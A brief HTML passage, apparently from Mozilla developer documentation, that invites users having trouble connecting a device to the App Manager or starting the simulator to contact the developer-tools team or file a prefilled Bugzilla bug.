<p>Can't connect your device to the App Manager or start the simulator? <a href="https://wiki.mozilla.org/DevTools/GetInvolved#Communication">Let us know</a> or <a href="https://bugzilla.mozilla.org/enter_bug.cgi?alias=&assigned_to=nobody%40mozilla.org&attach_text=&blocked=&bug_file_loc=http%3A%2F%2F&bug_ignored=0&bug_severity=normal&bug_status=NEW&cf_blocking_b2g=---&cf_crash_signature=&cf_status_b2g18=---&cf_status_b2g_1_1_hd=---&cf_status_b2g_1_2=---&cf_status_firefox24=---&cf_status_firefox25=---&cf_status_firefox26=---&cf_status_firefox27=---&cf_status_firefox_esr17=---&cf_status_firefox_esr24=---&cf_tracking_b2g18=---&cf_tracking_firefox24=---&cf_tracking_firefox25=---&cf_tracking_firefox26=---&cf_tracking_firefox27=---&cf_tracking_firefox_esr17=---&cf_tracking_firefox_esr24=---&cf_tracking_firefox_relnote=---&cf_tracking_relnote_b2g=---&comment=&component=Developer%20Tools%3A%20App%20Manager&contenttypeentry=&contenttypemethod=autodetect&contenttypeselection=text%2Fplain&data=&defined_groups=1&dependson=&description=&flag_type-203=X&flag_type-37=X&flag_type-41=X&flag_type-5=X&flag_type-607=X&flag_type-720=X&flag_type-721=X&flag_type-737=X&flag_type-748=X&flag_type-781=X&flag_type-787=X&flag_type-791=X&flag_type-799=X&flag_type-800=X&flag_type-802=X&flag_type-803=X&flag_type-809=X&flag_type-825=X&form_name=enter_bug&keywords=&maketemplate=Remember%20values%20as%20bookmarkable%20template&op_sys=All&priority=--&product=Firefox&qa_contact=developer.tools%40firefox.bugs&rep_platform=x86&requestee_type-203=&requestee_type-41=&requestee_type-5=&requestee_type-607=&requestee_type-748=&requestee_type-781=&requestee_type-787=&requestee_type-791=&requestee_type-800=&short_desc=&status_whiteboard=&target_milestone=---&version=Trunk">file a bug</a>. and</p>